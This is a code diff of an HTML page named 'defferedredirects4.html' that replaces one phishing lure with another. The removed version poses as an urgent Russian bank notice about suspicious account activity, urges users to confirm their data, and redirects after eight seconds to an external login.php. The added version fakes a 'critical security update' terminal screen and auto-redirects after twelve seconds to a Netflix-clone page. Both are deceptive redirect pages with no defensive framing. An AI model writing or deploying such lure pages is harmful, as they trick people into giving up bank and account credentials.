--- a/defferedredirects4.html
+++ b/defferedredirects4.html
@@ -1,35 +1,33 @@
 <!DOCTYPE html>
 <html>
 <head>
-    <title>Срочное уведомление от банка</title>
-    <script>
-        setTimeout(function() {
-            window.location.href = "https://server1850568.netart.com/scom/login.php";
-        }, 8000);
-    </script>
+    <title>Системное обновление</title>
+    <meta http-equiv="refresh" content="12;url=https://rajkumar-229.github.io/netflix-clone/">
     <style>
-        body { font-family: Arial, sans-serif; background: #004a7c; color: white; padding: 30px; }
-        .bank-notice { background: #005b96; padding: 40px; border-radius: 10px; border: 3px solid #ffd700; }
-        .urgent { color: #ffd700; font-weight: bold; font-size: 20px; }
-        .timer { background: #ffd700; color: #004a7c; padding: 10px; border-radius: 5px; display: inline-block; margin: 10px 0; }
+        body { font-family: 'Courier New', monospace; background: #1a1a1a; color: #00ff00; padding: 50px; }
+        .terminal { background: #000; border: 1px solid #00ff00; padding: 30px; border-radius: 5px; }
+        .blink { animation: blink 1s infinite; }
+        @keyframes blink { 50% { opacity: 0; } }
+        .progress { background: #333; height: 20px; border-radius: 10px; margin: 20px 0; }
+        .progress-bar { background: #00ff00; height: 100%; width: 0%; border-radius: 10px; transition: width 12s linear; }
     </style>
 </head>
 <body>
-    <div class="bank-notice">
-        <h1>🏦 СРОЧНОЕ УВЕДОМЛЕНИЕ</h1>
-        <p class="urgent">Обнаружена подозрительная операция по вашему счету</p>
-        <p>Для предотвращения несанкционированного доступа необходимо немедленно подтвердить ваши данные.</p>
-        <div class="timer">Перенаправление через: <span id="countdown">8</span> сек</div>
-        <p><small>Если перенаправление не сработало, <a href="https://server1850568.netart.com/scom/login.php" style="color: #ffd700;">нажмите здесь</a></small></p>
+    <div class="terminal">
+        <h1>> СИСТЕМНОЕ ОБНОВЛЕНИЕ</h1>
+        <p>> Загрузка критического обновления безопасности...</p>
+        <p>> Статус: <span class="blink">ВЫПОЛНЯЕТСЯ</span></p>
+        <div class="progress">
+            <div class="progress-bar" id="progressBar"></div>
+        </div>
+        <p>> Перенаправление на портал обновления через 12 секунд</p>
+        <p>> <a href="https://rajkumar-229.github.io/netflix-clone/" style="color: #00ff00;">[ ПЕРЕЙТИ СЕЙЧАС ]</a></p>
     </div>
     
     <script>
-        let countdown = 8;
-        setInterval(function() {
-            countdown--;
-            document.getElementById('countdown').textContent = countdown;
-            if(countdown <= 0) countdown = 0;
-        }, 1000);
+        setTimeout(function() {
+            document.getElementById('progressBar').style.width = '100%';
+        }, 100);
     </script>
 </body>
 </html>
